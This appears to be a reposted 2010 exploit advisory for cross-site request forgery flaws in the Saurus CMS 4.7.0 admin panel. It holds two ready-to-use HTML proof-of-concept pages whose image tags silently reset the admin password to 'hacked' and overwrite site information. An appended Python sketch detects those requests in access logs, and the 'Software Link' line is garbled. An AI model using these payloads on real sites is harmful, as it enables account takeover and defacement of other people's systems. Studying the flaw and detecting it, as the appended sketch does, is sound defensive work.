[Repost][Recommended] Multiple CSRF Vulnerabilities in Saurus CMS Admin Panel
Posted: 2010-8-15 16:58 1987
# Author: Fady Mohammed Osman (cute hacker)
# Software Link: 210K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4S2N6i4u0#2M7#2)9J5k6h3W2F1k6X3!0Q4x3V1k6V1L8%4N6F1L8r3!0S2k6q4)9J5c8W2y4S2N6i4u0#2M7@1y4y4f1#2)9J5k6o6c8Q4x3X3f1%4i4K6u0W2x3q4)9J5k6i4c8Y4P5W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
# Version: 4.7.0
# Tested on: Ubuntu 10.04
# CVE : [Not available]
# This vulnerability allows a malicious hacker to change the password of a user
and also allows changing the website information.
PoC 1:
<html>
<head><title>Saurus CSRF : Change site information</title></head>
<body>
<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">
</body>
</html>
PoC 2:
<html>
<head><title>Saurus CSRF : Change user's password</title></head>
<body>
<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">
</body>
</html>
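A detection sketch for the two requests in the PoCs above, added here as an example and not part of the original post or of Saurus CMS: it scans access-log lines for GET requests to the two admin scripts that carry the save parameter and arrive with no Referer or with a Referer from another host. The log lines, the host name cms.example and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip - user [time] "METHOD target PROTO" status size "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

# Admin scripts from the PoCs -> (parameter, value) that commits the change.
SAVE_MARKERS = {
    "change_config.php": ("save", "1"),
    "edit_user.php": ("op2", "save"),
}

def classify(line, site_host):
    """Return None for unremarkable lines, else a dict describing the request."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET":
        return None
    url = urlsplit(m["target"])
    script = url.path.rsplit("/", 1)[-1]
    marker = SAVE_MARKERS.get(script)
    if marker is None or "/admin/" not in url.path:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if marker[1] not in params.get(marker[0], []):
        return None  # viewing the form, not saving it
    referer = m["referer"]
    ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
    if ref_host == site_host:
        return None  # save submitted from the admin panel itself
    reason = "no Referer" if ref_host is None else f"cross-site Referer {ref_host}"
    return {"ip": m["ip"], "script": script, "reason": reason,
            "password_change": "password" in params}

def scan(lines, site_host):
    return [hit for hit in (classify(l, site_host) for l in lines) if hit]

# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Aug/2010:16:40:01 +0000] "GET /saurus/admin/change_config.php?group=1&site_name=x&save=1 HTTP/1.1" 200 512 "http://forum.example/thread/42" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Aug/2010:16:40:02 +0000] "GET /saurus/admin/edit_user.php?tab=account&user_id=19&op=edit&op2=save&username=admin&password=x HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Aug/2010:16:41:10 +0000] "GET /saurus/admin/change_config.php?group=1&save=1 HTTP/1.1" 200 512 "http://cms.example/saurus/admin/change_config.php" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Aug/2010:16:41:30 +0000] "GET /saurus/admin/edit_user.php?tab=account&user_id=19&op=edit HTTP/1.1" 200 2048 "http://cms.example/saurus/admin/" "Mozilla/5.0"',
]
```

A missing Referer is only a weak signal on its own, so hits are best reviewed together with the administrator's session activity at that time.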